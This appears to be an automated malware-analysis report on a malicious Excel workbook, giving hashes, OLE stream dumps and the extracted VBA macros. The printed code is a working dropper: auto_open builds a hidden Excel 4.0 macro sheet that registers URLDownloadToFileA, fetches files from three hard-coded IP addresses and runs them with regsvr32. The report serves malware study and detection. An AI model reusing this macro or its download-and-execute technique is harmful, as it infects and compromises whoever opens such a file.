    SHA1:d40763ea2a87946c34137adcca9d72a9dbb4f190
    SHA256:f0073fcb16de6f8c5c497d318853c3eaf9fb3d03d85ecaf009a33de179c879a2
    SHA512:a0bbbe112cca1e584aa828c320f888836c28b77cbf0ed93286cf6885e364408dbb178b816c0c8bf7d34e13b9539203e8dc194224b6a75da0a4e608395ff5df7d
    SSDEEP:3072:3k3hOdsylKlgxopeiBNhZFGzE+cL2kdAPc6YehWfGEtUHKGDbpmsiikati+RL+y:3k3hOdsylKlgxopeiBNhZF+E+W2kdAPb
    File Content Preview:........................>.......................................................b..............................................................................................................................................................................

    File Icon

    Icon Hash:e4eea286a4b4bcb4

    Static OLE Info

    General

    Document Type:OLE
    Number of OLE Files:1

    OLE File "Document_1680405650-10062021.xls"

    Indicators

    Has Summary Info:True
    Application Name:Microsoft Excel
    Encrypted Document:False
    Contains Word Document Stream:False
    Contains Workbook/Book Stream:True
    Contains PowerPoint Document Stream:False
    Contains Visio Document Stream:False
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:True

    Summary

    Code Page:1251
    Author:Test
    Last Saved By:Test
    Create Time:2015-06-05 18:17:20
    Last Saved Time:2021-10-06 07:51:31
    Creating Application:Microsoft Excel
    Security:0

    Document Summary

    Document Code Page:1251
    Thumbnail Scaling Desired:False
    Company:
    Contains Dirty Links:False
    Shared Document:False
    Changed Hyperlinks:False
    Application Version:1048576

    Streams with VBA

    VBA File Name: UserForm2, Stream Size: -1
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2
    VBA File Name:UserForm2
    Stream Size:-1
    Data ASCII:
    Data Raw:
    VBA Code
    Attribute VB_Name = "UserForm2"
    Attribute VB_Base = "0{321AAC3F-DD5A-4CF0-A4C5-4038687335A4}{A2E6A6F6-AD1B-4ECB-AF0A-AF8F18A7E980}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = False
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = False
    VBA File Name: Module1, Stream Size: 3267
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/Module1
    VBA File Name:Module1
    Stream Size:3267
    Data ASCII:. . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 03 f0 00 00 00 5a 04 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 88 04 00 00 b0 0a 00 00 00 00 00 00 01 00 00 00 fb 18 3d fb 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "Module1"
    
    Function jgfjgjfhfhf()
    Application.ScreenUpdating = False
    Set Fera = Excel4IntlMacroSheets
    Fera.Add.Name = "Diolare"
    Sheets("Diolare").Visible = False
    Nyrtyfh
    Sheets("Diolare").Range("H24") = UserForm2.Label1.Caption
    Sheets("Diolare").Range("H25") = UserForm2.Label3.Caption
    Sheets("Diolare").Range("H26") = UserForm2.Label4.Caption
    End Function
    Sub auto_close()
    
    
    Application.ScreenUpdating = True
       Application.DisplayAlerts = False
       Sheets("Diolare").Delete
       Application.DisplayAlerts = True
    
    End Sub
    
    Function Nyrtyfh()
    Sheets("Diolare").Range("A1:M100").Font.Color = vbWhite
    
    End Function
    
    
    Function hkjhjk()
    Sheets("Diolare").Range("G10") = UserForm2.Label5.Caption
    Sheets("Diolare").Range("G11") = UserForm2.Label5.Caption & "1"
    Sheets("Diolare").Range("G12") = UserForm2.Label5.Caption & "2"
    
    End Function
    
    
    Function Fdjgj()
    Sheets("Diolare").Range("H10") = "=" & "B" & "y" & "u" & "k" & "i" & "l" & "o" & "s(0,H24&K17&K18,G10,0,0)"
    Sheets("Diolare").Range("H11") = "=" & "B" & "y" & "u" & "k" & "i" & "l" & "o" & "s(0,H25&K17&K18,G11,0,0)"
    Sheets("Diolare").Range("H12") = "=" & "B" & "y" & "u" & "k" & "i" & "l" & "o" & "s(0,H26&K17&K18,G12,0,0)"
    
    End Function
    VBA File Name: Module2, Stream Size: 2740
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/Module2
    VBA File Name:Module2
    Stream Size:2740
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 03 f0 00 00 00 e2 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 10 03 00 00 dc 08 00 00 00 00 00 00 01 00 00 00 fb 18 75 d6 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "Module2"
    Function Retio()
    On Error Resume Next
    Bytruy = "R" & "E" & "G" & "I" & "STER"
    Neyrey = "="
    JRyf = "" & "E" & "" & "X" & "" & "E" & "" & "C"
    Loiu = UserForm2.Blost.Caption
    jgfjgjfhfhf
    
    
    Sheets("Diolare").Range("K17") = "=N" & "O" & "W()"
    Sheets("Diolare").Range("K18") = ".d" & "a" & "t"
    
    
    
    Sheets("Diolare").Range("H35") = "=" & "H" & "ALT()"
    Sheets("Diolare").Range("I9") = "u" & "R" & "l" & "M" & "o" & "n"
    Sheets("Diolare").Range("I10") = UserForm2.Caption
    Sheets("Diolare").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
    Sheets("Diolare").Range("I12") = "Byukilos"
    
    hkjhjk
    
    Sheets("Diolare").Range("I17") = Loiu
    Sheets("Diolare").Range("I18") = Loiu & "1"
    Sheets("Diolare").Range("I19") = Loiu & "2"
    
    Fdjgj
    
    Sheets("Diolare").Range("H9") = Neyrey & Bytruy & "(I9,I10&J10,I11,I12,,1,9)"
    Sheets("Diolare").Range("H17") = Neyrey & JRyf & "(I17)"
    Sheets("Diolare").Range("H18") = Neyrey & JRyf & "(I18)"
    Sheets("Diolare").Range("H19") = Neyrey & JRyf & "(I19)"
    End Function
    VBA File Name: Module5, Stream Size: 1116
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/Module5
    VBA File Name:Module5
    Stream Size:1116
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 01 f0 00 00 00 82 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 89 02 00 00 d1 03 00 00 00 00 00 00 01 00 00 00 fb 18 e3 25 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "Module5"
    
    Sub auto_open()
    Retio
    
    
    Application.Run Sheets("Diolare").Range("H1")
    
    End Sub
    VBA File Name: Sheet1, Stream Size: 991
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
    VBA File Name:Sheet1
    Stream Size:991
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . 9 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 fb 18 b4 39 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "Sheet1"
    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = True
    VBA File Name: ThisWorkbook, Stream Size: 3459
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
    VBA File Name:ThisWorkbook
    Stream Size:3459
    Data ASCII:. . . . . . . . . 2 . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . r S . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 32 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 39 04 00 00 b1 0a 00 00 00 00 00 00 01 00 00 00 fb 18 72 53 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "ThisWorkbook"
    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = True
    Option Explicit
    Public Sub applyLogosToDashboard()
        On Error Resume Next
    Application.ScreenUpdating = False
    
    If Not Application.OperatingSystem Like "*Mac*" Then
    
        Sheets("Dashboard").Activate
        Sheets("Dashboard").Unprotect Password:=Sheets("Logos").Range("IV1")
        ActiveSheet.Shapes("Apple_Logo").Visible = False
        ActiveSheet.Shapes("Win_Logo").Visible = True
        ActiveSheet.Shapes("Button_Insert_Logo").Visible = True
        ActiveSheet.Shapes("Button_Print_PDF").Visible = True
        ActiveSheet.Shapes("Button_Save_As").Visible = True
        ActiveSheet.Shapes("Button_Help").Visible = True
        ActiveSheet.Shapes("Button_Versions").Visible = True
        Sheets("Logos").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True
    
    Else
    
        Sheets("Dashboard").Activate
        Sheets("Dashboard").Unprotect Password:=Sheets("Dashboard").Range("IV1")
        ActiveSheet.Shapes("Apple_Logo").Visible = True
        ActiveSheet.Shapes("Win_Logo").Visible = False
        ActiveSheet.Shapes("Button_Insert_Logo").Visible = False
        ActiveSheet.Shapes("Button_Print_PDF").Visible = False
        ActiveSheet.Shapes("Button_Save_As").Visible = False
        Sheets("Dashboard").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True
    
    End If
    
        Application.ScreenUpdating = True
    
    End Sub
    
    
    Private Sub asWorkbook_Activateas()
    
    End Sub
    
    Private Sub saWorkbook_Opensa()
        On Error Resume Next
    
    
    End Sub
    
    Private Sub ssaaInitWorkbookssaa()
    End Sub
    VBA File Name: UserForm2, Stream Size: 1181
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/UserForm2
    VBA File Name:UserForm2
    Stream Size:1181
    Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 fb 18 b2 4a 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "UserForm2"
    Attribute VB_Base = "0{321AAC3F-DD5A-4CF0-A4C5-4038687335A4}{A2E6A6F6-AD1B-4ECB-AF0A-AF8F18A7E980}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = False
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = False

    Streams

    Stream Path: \x1CompObj, File Type: data, Stream Size: 108
    General
    Stream Path:\x1CompObj
    File Type:data
    Stream Size:108
    Entropy:4.18849998853
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
    General
    Stream Path:\x5DocumentSummaryInformation
    File Type:data
    Stream Size:244
    Entropy:2.65175227267
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
    General
    Stream Path:\x5SummaryInformation
    File Type:data
    Stream Size:208
    Entropy:3.35331470988
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . . . . . . . . . . . . . . . .
    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 101947
    General
    Stream Path:Workbook
    File Type:Applesoft BASIC program data, first line number 16
    Stream Size:101947
    Entropy:7.65093094683
    Base64 Encoded:True
    Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V q % 8 . . . . . . . X . @
    Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 54 65 73 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 743
    General
    Stream Path:_VBA_PROJECT_CUR/PROJECT
    File Type:ASCII text, with CRLF line terminators
    Stream Size:743
    Entropy:5.27552225461
    Base64 Encoded:True
    Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 5 . . B a s e C l a s s = U s e r F o r m 2 . . M o d u l e = M o d u l e 1 . . M o d u l e = M o d u l e 2 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . .
    Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37
    Stream Path: _VBA_PROJECT_CUR/PROJECTlk, File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537, Stream Size: 30
    General
    Stream Path:_VBA_PROJECT_CUR/PROJECTlk
    File Type:dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
    Stream Size:30
    Entropy:1.37215976263
    Base64 Encoded:False
    Data ASCII:. . . . . . " E . . . . . . . . . . . . . F . . . . . . . .
    Data Raw:01 00 01 00 00 00 22 45 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 164
    General
    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
    File Type:data
    Stream Size:164
    Entropy:3.40743696106
    Base64 Encoded:False
    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . M o d u l e 2 . M . o . d . u . l . e . 2 . . . . .
    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 35 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 35 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00
    Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2/\x1CompObj
    File Type:data
    Stream Size:97
    Entropy:3.61064918306
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 302
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2/\x3VBFrame
    File Type:ASCII text, with CRLF line terminators
    Stream Size:302
    Entropy:4.65387104915
    Base64 Encoded:True
    Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
    Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69
    Stream Path: _VBA_PROJECT_CUR/UserForm2/f, File Type: data, Stream Size: 307
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2/f
    File Type:data
    Stream Size:307
    Entropy:3.62190320372
    Base64 Encoded:False
    Data ASCII:. . $ . . . . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . P . . . . . . . B l o s t 4 . . .
    Data Raw:00 04 24 00 08 0c 10 0c 0c 00 00 00 ff ff 00 00 14 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 cc 00 00 90 01 44 42 01 00 06 54 61 68 6f 6d 61 00 00 05 00 00 00 e0 00 00 00 00 85 01 00 00 00 28 00 f5 01 00 00 06 00 00 80 07 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 00 00 d4 00 00 00 d4
    Stream Path: _VBA_PROJECT_CUR/UserForm2/o, File Type: data, Stream Size: 356
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2/o
    File Type:data
    Stream Size:356
    Entropy:3.89820436327
    Base64 Encoded:True
    Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 0 7 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 9 4 . 1 4 0 . 1 1 4 . 1 1 1 / . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 8 . 1 6 5 . 6 2 . 5 0 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . 0 . ( . . . . . . . r e g s v r 3 2 - s i l e n t . . \\ C e l o d . w a
    Data Raw:00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 30 37 2f 01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 28 00 28 00 00 00 16 00 00 80 68 74 74 70 3a 2f 2f 39 34 2e 31 34 30 2e 31 31 34 2e 31 31 31 2f 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80
    Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4742
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
    File Type:data
    Stream Size:4742
    Entropy:4.52712950519
    Base64 Encoded:False
    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
    Data Raw:cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2762
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
    File Type:data
    Stream Size:2762
    Entropy:3.46797277739
    Base64 Encoded:False
